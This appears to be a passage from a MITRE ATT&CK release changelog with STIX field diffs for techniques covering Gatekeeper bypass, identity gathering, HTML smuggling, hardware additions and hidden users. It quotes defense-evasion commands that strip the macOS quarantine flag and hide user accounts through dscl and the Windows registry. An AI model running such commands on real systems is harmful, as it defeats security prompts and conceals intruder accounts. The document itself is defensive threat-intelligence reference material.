can be recursively removed from all files in a folder using xattr, sudo xattr -d com.apple.quarantine /path/to/folder.(Citation: 20 macOS Common Tools and Techniques)(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: theevilbit gatekeeper bypass 2021) Apps and files loaded onto the system from a USB flash drive, optical disk, external hard drive, from a drive shared over the local network, or using the curl command do not set this flag. Additionally, it is possible to avoid setting this flag using [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), which may bypass Gatekeeper. (Citation: Methods of Mac Malware Persistence)(Citation: Clearing quarantine attribute)(Citation: OceanLotus for OS X) |
Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs. Gatekeeper is a set of technologies that act as layer of Apple’s security model to ensure only trusted applications are executed on a host. Gatekeeper was built on top of File Quarantine in Snow Leopard (10.6, 2009) and has grown to include Code Signing, security policy compliance, Notarization, and more. Gatekeeper also treats applications running for the first time differently than reopened applications.(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: TheEclecticLightCompany apple notarization ) Based on an opt-in system, when files are downloaded an extended attribute (xattr) called `com.apple.quarantine` (also known as a quarantine flag) can be set on the file by the application performing the download. Launch Services opens the application in a suspended state. For first run applications with the quarantine flag set, Gatekeeper executes the following functions: 1. Checks extended attribute – Gatekeeper checks for the quarantine flag, then provides an alert prompt to the user to allow or deny execution.(Citation: OceanLotus for OS X)(Citation: 20 macOS Common Tools and Techniques) 2. Checks System Policies - Gatekeeper checks the system security policy, allowing execution of apps downloaded from either just the App Store or the App Store and identified developers. 3. Code Signing – Gatekeeper checks for a valid code signature from an Apple Developer ID. 4. Notarization - Using the `api.apple-cloudkit.com` API, Gatekeeper reaches out to Apple servers to verify or pull down the notarization ticket and ensure the ticket is not revoked. Users can override notarization, which will result in a prompt of executing an “unauthorized app” and the security policy will be modified. Adversaries can subvert one or multiple security controls within Gatekeeper checks through logic errors (e.g. [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211)), unchecked file types, and external libraries. For example, prior to macOS 13 Ventura, code signing and notarization checks were only conducted on first launch, allowing adversaries to write malicious executables to previously opened applications in order to bypass Gatekeeper security checks.(Citation: theevilbit gatekeeper bypass 2021)(Citation: Application Bundle Manipulation Brandon Dalton) Applications and files loaded onto the system from a USB flash drive, optical disk, external hard drive, from a drive shared over the local network, or using the curl command may not set the quarantine flag. Additionally, it is possible to avoid setting the quarantine flag using [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Brandon Dalton @PartyD0lphin', 'Swasti Bhushan Deb, IBM India Pvt. Ltd.'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User', 'Administrator'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-14 21:18:30.629000+00:00 | 2022-10-21 19:30:58.414000+00:00 |
| description | Adversaries may modify file attributes that signify programs are from untrusted sources to subvert Gatekeeper controls in macOS. When documents, applications, or programs are downloaded an extended attribute (xattr) called com.apple.quarantine can be set on the file by the application performing the download. This attribute, also known as a quarantine flag, is read by Apple's Gatekeeper defense program when the file is run and provides a prompt to the user to allow or deny execution. Gatekeeper also monitors an application's usage of dynamic libraries (dylibs) loaded outside the application folder on any quarantined binary, often using the dlopen function. If the quarantine flag is set in macOS 10.15+, Gatekeeper also checks for a notarization ticket and sends a cryptographic hash to Apple's servers to check for validity for all unsigned executables.(Citation: TheEclecticLightCompany apple notarization )(Citation: Bypassing Gatekeeper)
The quarantine flag is an opt-in system and not imposed by macOS. If an application opts-in, a file downloaded from the Internet will be given a quarantine flag before being saved to disk. Any application or user with write permissions to the file can change or strip the quarantine flag. With elevated permission (sudo), this attribute can be removed from any file. The presence of the com.apple.quarantine quarantine flag can be checked with the xattr command xattr -l /path/to/examplefile. Similarly, this attribute can be recursively removed from all files in a folder using xattr, sudo xattr -d com.apple.quarantine /path/to/folder.(Citation: 20 macOS Common Tools and Techniques)(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: theevilbit gatekeeper bypass 2021)
Apps and files loaded onto the system from a USB flash drive, optical disk, external hard drive, from a drive shared over the local network, or using the curl command do not set this flag. Additionally, it is possible to avoid setting this flag using [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), which may bypass Gatekeeper. (Citation: Methods of Mac Malware Persistence)(Citation: Clearing quarantine attribute)(Citation: OceanLotus for OS X) |
Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs. Gatekeeper is a set of technologies that act as layer of Apple’s security model to ensure only trusted applications are executed on a host. Gatekeeper was built on top of File Quarantine in Snow Leopard (10.6, 2009) and has grown to include Code Signing, security policy compliance, Notarization, and more. Gatekeeper also treats applications running for the first time differently than reopened applications.(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: TheEclecticLightCompany apple notarization ) Based on an opt-in system, when files are downloaded an extended attribute (xattr) called `com.apple.quarantine` (also known as a quarantine flag) can be set on the file by the application performing the download. Launch Services opens the application in a suspended state. For first run applications with the quarantine flag set, Gatekeeper executes the following functions: 1. Checks extended attribute – Gatekeeper checks for the quarantine flag, then provides an alert prompt to the user to allow or deny execution.(Citation: OceanLotus for OS X)(Citation: 20 macOS Common Tools and Techniques) 2. Checks System Policies - Gatekeeper checks the system security policy, allowing execution of apps downloaded from either just the App Store or the App Store and identified developers. 3. Code Signing – Gatekeeper checks for a valid code signature from an Apple Developer ID. 4. Notarization - Using the `api.apple-cloudkit.com` API, Gatekeeper reaches out to Apple servers to verify or pull down the notarization ticket and ensure the ticket is not revoked. Users can override notarization, which will result in a prompt of executing an “unauthorized app” and the security policy will be modified. Adversaries can subvert one or multiple security controls within Gatekeeper checks through logic errors (e.g. [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211)), unchecked file types, and external libraries. For example, prior to macOS 13 Ventura, code signing and notarization checks were only conducted on first launch, allowing adversaries to write malicious executables to previously opened applications in order to bypass Gatekeeper security checks.(Citation: theevilbit gatekeeper bypass 2021)(Citation: Application Bundle Manipulation Brandon Dalton) Applications and files loaded onto the system from a USB flash drive, optical disk, external hard drive, from a drive shared over the local network, or using the curl command may not set the quarantine flag. Additionally, it is possible to avoid setting the quarantine flag using [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). |
| external_references[1]['source_name'] | TheEclecticLightCompany apple notarization | Application Bundle Manipulation Brandon Dalton |
| external_references[1]['description'] | How Notarization Works. (2020, August 28). How notarization works. Retrieved September 13, 2021. | Brandon Dalton. (2022, August 9). A bundle of nerves: Tweaking macOS security controls to thwart application bundle manipulation. Retrieved September 27, 2022. |
| external_references[1]['url'] | https://eclecticlight.co/2020/08/28/how-notarization-works/ | https://redcanary.com/blog/mac-application-bundles/ |
| external_references[2]['source_name'] | Bypassing Gatekeeper | theevilbit gatekeeper bypass 2021 |
| external_references[2]['description'] | Thomas Reed. (2016, March 31). Bypassing Apple's Gatekeeper. Retrieved July 5, 2017. | Csaba Fitzl. (2021, June 29). GateKeeper - Not a Bypass (Again). Retrieved September 22, 2021. |
| external_references[2]['url'] | https://blog.malwarebytes.com/cybercrime/2015/10/bypassing-apples-gatekeeper/ | https://theevilbit.github.io/posts/gatekeeper_not_a_bypass/ |
| external_references[3]['source_name'] | 20 macOS Common Tools and Techniques | OceanLotus for OS X |
| external_references[3]['description'] | Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021. | Eddie Lee. (2016, February 17). OceanLotus for OS X - an Application Bundle Pretending to be an Adobe Flash Update. Retrieved July 5, 2017. |
| external_references[3]['url'] | https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/ | https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update |
| external_references[5]['source_name'] | theevilbit gatekeeper bypass 2021 | TheEclecticLightCompany apple notarization |
| external_references[5]['description'] | Csaba Fitzl. (2021, June 29). GateKeeper - Not a Bypass (Again). Retrieved September 22, 2021. | How Notarization Works. (2020, August 28). How notarization works. Retrieved September 13, 2021. |
| external_references[5]['url'] | https://theevilbit.github.io/posts/gatekeeper_not_a_bypass/ | https://eclecticlight.co/2020/08/28/how-notarization-works/ |
| external_references[6]['source_name'] | Methods of Mac Malware Persistence | 20 macOS Common Tools and Techniques |
| external_references[6]['description'] | Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017. | Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021. |
| external_references[6]['url'] | https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf | https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/ |
| x_mitre_data_sources[0] | File: File Metadata | Command: Command Execution |
| x_mitre_data_sources[3] | Command: Command Execution | File: File Metadata |
| x_mitre_defense_bypassed[0] | Application control | Anti-virus |
| x_mitre_defense_bypassed[1] | Anti-virus | Application Control |
| x_mitre_version | 1.1 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Clearing quarantine attribute', 'description': 'Rich Trouton. (2012, November 20). Clearing the quarantine extended attribute from downloaded applications. Retrieved July 5, 2017.', 'url': 'https://derflounder.wordpress.com/2012/11/20/clearing-the-quarantine-extended-attribute-from-downloaded-applications/'} | |
| external_references | {'source_name': 'OceanLotus for OS X', 'description': 'Eddie Lee. (2016, February 17). OceanLotus for OS X - an Application Bundle Pretending to be an Adobe Flash Update. Retrieved July 5, 2017.', 'url': 'https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update'} |
| Old Description | New Description |
|---|---|
| Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, etc.) as well as sensitive details such as credentials. Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about victims may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak)(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)). | Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, etc.) as well as sensitive details such as credentials. Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about users could also be enumerated via other active means (i.e. [Active Scanning](https://attack.mitre.org/techniques/T1595)) such as probing and analyzing responses from authentication services that may reveal valid usernames in a system.(Citation: GrimBlog UsernameEnum) Information about victims may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak)(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)). |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Jannie Li, Microsoft Threat Intelligence\u202fCenter\u202f(MSTIC)'] | |
| x_mitre_data_sources | ['Network Traffic: Network Traffic Content'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-15 03:27:49.579000+00:00 | 2022-04-21 14:39:39.857000+00:00 |
| description | Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, etc.) as well as sensitive details such as credentials. Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about victims may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak)(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)). | Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, etc.) as well as sensitive details such as credentials. Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about users could also be enumerated via other active means (i.e. [Active Scanning](https://attack.mitre.org/techniques/T1595)) such as probing and analyzing responses from authentication services that may reveal valid usernames in a system.(Citation: GrimBlog UsernameEnum) Information about victims may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak)(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)). |
| external_references[2]['source_name'] | Register Deloitte | Detectify Slack Tokens |
| external_references[2]['description'] | Thomson, I. (2017, September 26). Deloitte is a sitting duck: Key systems with RDP open, VPN and proxy 'login details leaked'. Retrieved October 19, 2020. | Detectify. (2016, April 28). Slack bot token leakage exposing business critical information. Retrieved October 19, 2020. |
| external_references[2]['url'] | https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/ | https://labs.detectify.com/2016/04/28/slack-bot-token-leakage-exposing-business-critical-information/ |
| external_references[3]['source_name'] | Register Uber | GitHub truffleHog |
| external_references[3]['description'] | McCarthy, K. (2015, February 28). FORK ME! Uber hauls GitHub into court to find who hacked database of 50,000 drivers. Retrieved October 19, 2020. | Dylan Ayrey. (2016, December 31). truffleHog. Retrieved October 19, 2020. |
| external_references[3]['url'] | https://www.theregister.com/2015/02/28/uber_subpoenas_github_for_hacker_details/ | https://github.com/dxa4481/truffleHog |
| external_references[4]['source_name'] | Detectify Slack Tokens | GrimBlog UsernameEnum |
| external_references[4]['description'] | Detectify. (2016, April 28). Slack bot token leakage exposing business critical information. Retrieved October 19, 2020. | GrimHacker. (2017, July 24). Office365 ActiveSync Username Enumeration. Retrieved December 9, 2021. |
| external_references[4]['url'] | https://labs.detectify.com/2016/04/28/slack-bot-token-leakage-exposing-business-critical-information/ | https://grimhacker.com/2017/07/24/office365-activesync-username-enumeration/ |
| external_references[5]['source_name'] | Forbes GitHub Creds | Register Uber |
| external_references[5]['description'] | Sandvik, R. (2014, January 14). Attackers Scrape GitHub For Cloud Service Credentials, Hijack Account To Mine Virtual Currency. Retrieved October 19, 2020. | McCarthy, K. (2015, February 28). FORK ME! Uber hauls GitHub into court to find who hacked database of 50,000 drivers. Retrieved October 19, 2020. |
| external_references[5]['url'] | https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196 | https://www.theregister.com/2015/02/28/uber_subpoenas_github_for_hacker_details/ |
| external_references[6]['source_name'] | GitHub truffleHog | GitHub Gitrob |
| external_references[6]['description'] | Dylan Ayrey. (2016, December 31). truffleHog. Retrieved October 19, 2020. | Michael Henriksen. (2018, June 9). Gitrob: Putting the Open Source in OSINT. Retrieved October 19, 2020. |
| external_references[6]['url'] | https://github.com/dxa4481/truffleHog | https://github.com/michenriksen/gitrob |
| external_references[7]['source_name'] | GitHub Gitrob | CNET Leaks |
| external_references[7]['description'] | Michael Henriksen. (2018, June 9). Gitrob: Putting the Open Source in OSINT. Retrieved October 19, 2020. | Ng, A. (2019, January 17). Massive breach leaks 773 million email addresses, 21 million passwords. Retrieved October 20, 2020. |
| external_references[7]['url'] | https://github.com/michenriksen/gitrob | https://www.cnet.com/news/massive-breach-leaks-773-million-emails-21-million-passwords/ |
| external_references[8]['source_name'] | CNET Leaks | Forbes GitHub Creds |
| external_references[8]['description'] | Ng, A. (2019, January 17). Massive breach leaks 773 million email addresses, 21 million passwords. Retrieved October 20, 2020. | Sandvik, R. (2014, January 14). Attackers Scrape GitHub For Cloud Service Credentials, Hijack Account To Mine Virtual Currency. Retrieved October 19, 2020. |
| external_references[8]['url'] | https://www.cnet.com/news/massive-breach-leaks-773-million-emails-21-million-passwords/ | https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196 |
| x_mitre_detection | Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. | Monitor for suspicious network traffic that could be indicative of probing for user information, such as large/iterative quantities of authentication requests originating from a single source (especially if the source is known to be associated with an adversary/botnet). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields. Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. |
| x_mitre_version | 1.0 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Register Deloitte', 'description': "Thomson, I. (2017, September 26). Deloitte is a sitting duck: Key systems with RDP open, VPN and proxy 'login details leaked'. Retrieved October 19, 2020.", 'url': 'https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/'} |
| Description |
|---|
Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.(Citation: HTML Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018)
Adversaries may deliver payloads to victims that bypass security controls through HTML Smuggling by abusing JavaScript Blobs and/or HTML5 download attributes. Security controls such as web content filters may not identify smuggled malicious files inside of HTML/JS files, as the content may be based on typically benign MIME types such as text/plain and/or text/html. Malicious files or data can be obfuscated and hidden inside of HTML files through Data URLs and/or JavaScript Blobs and can be deobfuscated when they reach the victim (i.e. [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)), potentially bypassing content filters.
For example, JavaScript Blobs can be abused to dynamically generate malicious files in the victim machine and may be dropped to disk by abusing JavaScript functions such as msSaveBlob.(Citation: HTML Smuggling Menlo Security 2020)(Citation: MSTIC NOBELIUM May 2021)(Citation: Outlflank HTML Smuggling 2018)(Citation: nccgroup Smuggling HTA 2017) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-18 12:03:12.510000+00:00 | 2022-05-19 16:29:47.637000+00:00 |
| external_references[1]['source_name'] | HTML Smuggling Menlo Security 2020 | Outlflank HTML Smuggling 2018 |
| external_references[1]['description'] | Subramanian, K. (2020, August 18). New HTML Smuggling Attack Alert: Duri. Retrieved May 20, 2021. | Hegt, S. (2018, August 14). HTML smuggling explained. Retrieved May 20, 2021. |
| external_references[1]['url'] | https://www.menlosecurity.com/blog/new-attack-alert-duri | https://outflank.nl/blog/2018/08/14/html-smuggling-explained/ |
| external_references[2]['source_name'] | Outlflank HTML Smuggling 2018 | MSTIC NOBELIUM May 2021 |
| external_references[2]['description'] | Hegt, S. (2018, August 14). HTML smuggling explained. Retrieved May 20, 2021. | Microsoft Threat Intelligence Center (MSTIC). (2021, May 27). New sophisticated email-based attack from NOBELIUM. Retrieved May 28, 2021. |
| external_references[2]['url'] | https://outflank.nl/blog/2018/08/14/html-smuggling-explained/ | https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/ |
| external_references[3]['source_name'] | MSTIC NOBELIUM May 2021 | HTML Smuggling Menlo Security 2020 |
| external_references[3]['description'] | Microsoft Threat Intelligence Center (MSTIC). (2021, May 27). New sophisticated email-based attack from NOBELIUM. Retrieved May 28, 2021. | Subramanian, K. (2020, August 18). New HTML Smuggling Attack Alert: Duri. Retrieved May 20, 2021. |
| external_references[3]['url'] | https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/ | https://www.menlosecurity.com/blog/new-attack-alert-duri |
| x_mitre_defense_bypassed[0] | Web content filters | Anti-virus |
| x_mitre_defense_bypassed[1] | Anti-virus | Web Content Filters |
| x_mitre_defense_bypassed[2] | Static file analysis | Static File Analysis |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | Krishnan Subramanian, @krish203 | |
| x_mitre_contributors | Vinay Pidathala |
| Old Description | New Description |
|---|---|
| Adversaries may introduce computer accessories, computers, or networking hardware into a system or network that can be used as a vector to gain access. While public references of usage by threat actors are scarce, many red teams/penetration testers leverage hardware additions for initial access. Commercial and open source products can be leveraged with capabilities such as passive network tapping (Citation: Ossmann Star Feb 2011), network traffic modification (i.e. [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)) (Citation: Aleks Weapons Nov 2015), keystroke injection (Citation: Hak5 RubberDuck Dec 2016), kernel memory reading via DMA (Citation: Frisk DMA August 2016), addition of new wireless access to an existing network (Citation: McMillan Pwn March 2012), and others. | Adversaries may introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091)), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused. While public references of usage by threat actors are scarce, many red teams/penetration testers leverage hardware additions for initial access. Commercial and open source products can be leveraged with capabilities such as passive network tapping, network traffic modification (i.e. [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)), keystroke injection, kernel memory reading via DMA, addition of new wireless access to an existing network, and others.(Citation: Ossmann Star Feb 2011)(Citation: Aleks Weapons Nov 2015)(Citation: Frisk DMA August 2016)(Citation: McMillan Pwn March 2012) |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_data_sources | ['Drive: Drive Creation', 'Application Log: Application Log Content', 'Network Traffic: Network Traffic Flow'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Michael Ossmann. (2011, February 17). Throwing Star LAN Tap. Retrieved March 30, 2018. | |
| external_references | CAPEC-440 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | CAPEC-440 | |
| external_references | Ulf Frisk. (2016, August 5). Direct Memory Attack the Kernel. Retrieved March 30, 2018. |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-08-17 00:28:00.947000+00:00 | 2022-04-28 16:09:12.782000+00:00 |
| description | Adversaries may introduce computer accessories, computers, or networking hardware into a system or network that can be used as a vector to gain access. While public references of usage by threat actors are scarce, many red teams/penetration testers leverage hardware additions for initial access. Commercial and open source products can be leveraged with capabilities such as passive network tapping (Citation: Ossmann Star Feb 2011), network traffic modification (i.e. [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)) (Citation: Aleks Weapons Nov 2015), keystroke injection (Citation: Hak5 RubberDuck Dec 2016), kernel memory reading via DMA (Citation: Frisk DMA August 2016), addition of new wireless access to an existing network (Citation: McMillan Pwn March 2012), and others. | Adversaries may introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091)), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused. While public references of usage by threat actors are scarce, many red teams/penetration testers leverage hardware additions for initial access. Commercial and open source products can be leveraged with capabilities such as passive network tapping, network traffic modification (i.e. [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)), keystroke injection, kernel memory reading via DMA, addition of new wireless access to an existing network, and others.(Citation: Ossmann Star Feb 2011)(Citation: Aleks Weapons Nov 2015)(Citation: Frisk DMA August 2016)(Citation: McMillan Pwn March 2012) |
| external_references[1]['source_name'] | capec | Ossmann Star Feb 2011 |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/440.html | https://ossmann.blogspot.com/2011/02/throwing-star-lan-tap.html |
| external_references[2]['source_name'] | Ossmann Star Feb 2011 | Aleks Weapons Nov 2015 |
| external_references[2]['description'] | Michael Ossmann. (2011, February 17). Throwing Star LAN Tap. Retrieved March 30, 2018. | Nick Aleks. (2015, November 7). Weapons of a Pentester - Understanding the virtual & physical tools used by white/black hat hackers. Retrieved March 30, 2018. |
| external_references[2]['url'] | https://ossmann.blogspot.com/2011/02/throwing-star-lan-tap.html | https://www.youtube.com/watch?v=lDvf4ScWbcQ |
| external_references[3]['source_name'] | Aleks Weapons Nov 2015 | McMillan Pwn March 2012 |
| external_references[3]['description'] | Nick Aleks. (2015, November 7). Weapons of a Pentester - Understanding the virtual & physical tools used by white/black hat hackers. Retrieved March 30, 2018. | Robert McMillan. (2012, March 3). The Pwn Plug is a little white box that can hack your network. Retrieved March 30, 2018. |
| external_references[3]['url'] | https://www.youtube.com/watch?v=lDvf4ScWbcQ | https://arstechnica.com/information-technology/2012/03/the-pwn-plug-is-a-little-white-box-that-can-hack-your-network/ |
| external_references[4]['source_name'] | Hak5 RubberDuck Dec 2016 | Frisk DMA August 2016 |
| external_references[4]['description'] | Hak5. (2016, December 7). Stealing Files with the USB Rubber Ducky – USB Exfiltration Explained. Retrieved March 30, 2018. | Ulf Frisk. (2016, August 5). Direct Memory Attack the Kernel. Retrieved March 30, 2018. |
| external_references[4]['url'] | https://www.hak5.org/blog/main-blog/stealing-files-with-the-usb-rubber-ducky-usb-exfiltration-explained | https://www.youtube.com/watch?v=fXthwl6ShOg |
| external_references[5]['source_name'] | Frisk DMA August 2016 | capec |
| external_references[5]['url'] | https://www.youtube.com/watch?v=fXthwl6ShOg | https://capec.mitre.org/data/definitions/440.html |
| x_mitre_version | 1.2 | 1.6 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'McMillan Pwn March 2012', 'description': 'Robert McMillan. (2012, March 3). The Pwn Plug is a little white box that can hack your network. Retrieved March 30, 2018.', 'url': 'https://arstechnica.com/information-technology/2012/03/the-pwn-plug-is-a-little-white-box-that-can-hack-your-network/'} |
| Old Description | New Description |
|---|---|
Adversaries may use hidden users to mask the presence of user accounts they create or modify. Normal users may want to hide users when there are many users accounts on a given system or want to keep an account hidden from the other users on the system. In macOS, every user account has a userID associated with it. When creating a user, you can specify the userID for that account. There is a property value in /Library/Preferences/com.apple.loginwindow called Hide500Users that prevents users with userIDs 500 and lower from appearing at the login screen. When using the [Create Account](https://attack.mitre.org/techniques/T1136) technique with a userID under 500 (ex: sudo dscl . -create /Users/username UniqueID 401) and enabling this property (setting it to Yes), an adversary can conceal user accounts. (Citation: Cybereason OSX Pirrit) In Windows, adversaries may hide user accounts via settings in the Registry. For example, an adversary may add a value to the Windows Registry (via [Reg](https://attack.mitre.org/software/S0075) or other means) that will hide the user “test” from the Windows login screen: reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccountsUserList' /v test /t REG_DWORD /d 0 /f.(Citation: FireEye SMOKEDHAM 